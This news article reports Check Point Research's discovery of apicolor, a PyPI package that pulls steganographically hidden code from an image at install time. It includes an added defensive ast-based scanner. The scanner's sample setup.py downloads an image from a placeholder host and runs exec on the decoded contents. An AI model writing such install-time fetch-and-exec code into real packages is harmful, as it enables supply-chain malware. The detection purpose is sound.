Check Point Research has detected a malicious open source package that uses steganography to hide malicious code inside image files.
The malicious package was available on PyPI, a package index widely used by Python developers. After being notified of it, PyPI’s maintainers removed the malicious package.
The malicious package, apicolor, looks like one of the many development packages available on PyPI. Its header states the package is a “core lib for REST API.” The install script for apicolor contains instructions to download additional packages (requests and judyb), along with an image from the Internet. The script then uses the steganography functions in judyb to extract and execute the malicious code hidden inside the image file. That code downloads malware from the Internet and installs it on the user’s machine.
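The install-time behaviour described above can be checked for statically before a package is installed. The script below is an added example, not Check Point Research's tooling or the apicolor code; it parses a constructed sample setup.py with Python's `ast` module and flags the indicators the article names (a steganography dependency, a network fetch during installation, and `exec`/`eval` of decoded data).

```python
"""Static indicator scan for a setup.py (added example, defender-side)."""
import ast

# Constructed sample illustrating the pattern described in the article.
# It is not the real apicolor install script; the URL is a placeholder.
SAMPLE_SETUP_PY = '''
import subprocess, sys
subprocess.check_call([sys.executable, "-m", "pip", "install", "requests", "judyb"])
import requests
from judyb import lsb
open("pic.png", "wb").write(requests.get("http://example.invalid/pic.png").content)
exec(lsb.reveal("pic.png"))
'''

# A benign setup.py for comparison (also constructed).
BENIGN_SETUP_PY = '''
from setuptools import setup
setup(name="apicolor", install_requires=["requests"])
'''

STEGO_LIBS = {"judyb"}                      # steganography library named in the article
NETWORK_MODULES = {"requests", "urllib", "urllib.request", "http.client", "socket"}
DYNAMIC_EXEC = {"exec", "eval"}


def scan_setup_script(source: str) -> list:
    """Return the sorted list of indicator names found in a setup.py source string."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in STEGO_LIBS:
                    findings.add("stego-import")
                if alias.name in NETWORK_MODULES:
                    findings.add("network-import")
        elif isinstance(node, ast.ImportFrom) and node.module:
            if node.module.split(".")[0] in STEGO_LIBS:
                findings.add("stego-import")
            if node.module in NETWORK_MODULES:
                findings.add("network-import")
        elif isinstance(node, ast.Call):
            # Direct exec()/eval() calls, e.g. exec(lsb.reveal(...))
            if isinstance(node.func, ast.Name) and node.func.id in DYNAMIC_EXEC:
                findings.add("dynamic-exec")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            # "judyb" passed to pip at install time, or a hard-coded download URL
            if node.value in STEGO_LIBS:
                findings.add("stego-dependency")
            if node.value.startswith(("http://", "https://")):
                findings.add("remote-url")
    return sorted(findings)


if __name__ == "__main__":
    print("sample:", scan_setup_script(SAMPLE_SETUP_PY))
    print("benign:", scan_setup_script(BENIGN_SETUP_PY))
```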
The impact appears minimal: Check Point Research found only three GitHub users including apicolor and judyb in their code, and a little over 80 projects containing the malicious packages. The infection method relies on people stumbling across these open source projects and installing them on their machines, “not knowing it brings in a malicious package import,” the team said.
The more important takeaway? “These findings reflect careful planning and thought by a threat actor, who proves that obfuscation techniques on PyPI have evolved,” Check Point Research wrote on the team’s blog.
Attackers are no longer simply relying on the technique of copying and renaming existing packages and hiding malicious code inside them. Instead, they are targeting certain types of users, often those working from home, and people using corporate machines for side projects, according to the research team.